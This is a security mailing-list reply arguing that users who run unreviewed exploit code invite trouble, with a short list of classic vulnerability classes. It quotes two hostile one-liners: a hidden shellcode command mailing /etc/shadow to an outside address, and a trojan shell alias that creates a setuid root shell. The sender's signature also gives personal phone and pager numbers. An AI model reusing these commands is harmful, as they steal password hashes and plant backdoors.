Yesterday, Matt Lewis wrote:
> How did this get approved, did anyone test it or review it?

and Today, Brett Eldridge pointed out:

> i don't think that the moderator's job is to test all the exploits that
> get mailed to the list.
[...]
> that said, anybody who blindly uses exploit code deserves what they get.
> next time, test the code in a controlled environment.

This is just history repeating itself. Remember that 'sshd exploit
code' someone posted here about 2-3 years back? For some reason you
*had* to run it as root. Burried in its shellcode was a very simple
'mailx [EMAIL PROTECTED] < /etc/shadow'. This is just old news and
new kiddies thinking they're being special by playing with old tricks.

If you run code without looking at it or thinking it through, "Boo Hoo!"

Show me something new and exciting.

Security hasn't changed much:
[1] Backdoors/easter-eggs (Sendmail 3.x 'WIZ'->Borland Inprise)
[2] buffer overflows (fingerd->statd->imapd)
[3] race conditions and a lack of randomness (think /tmp, TCP sequencing)
[4] permissions (Remember when SunOS and Solaris installed with a mode 666
    /var/adm/messages? Various distros of Linux did the same 3 years later
    with its syslogs.)
[5] trojans (alias mroe='cp /bin/sh /tmp/sh; chmod 04755 /tmp/sh')

-Jon
--
Jonathan Katz [] [EMAIL PROTECTED] [] http://jonworld.com
"Live fast, die young, leave a really messy corpse."
Cell: 317-698-4023 [] Pager: 800-759-8888 1770869 aka [EMAIL PROTECTED]

Reply via email to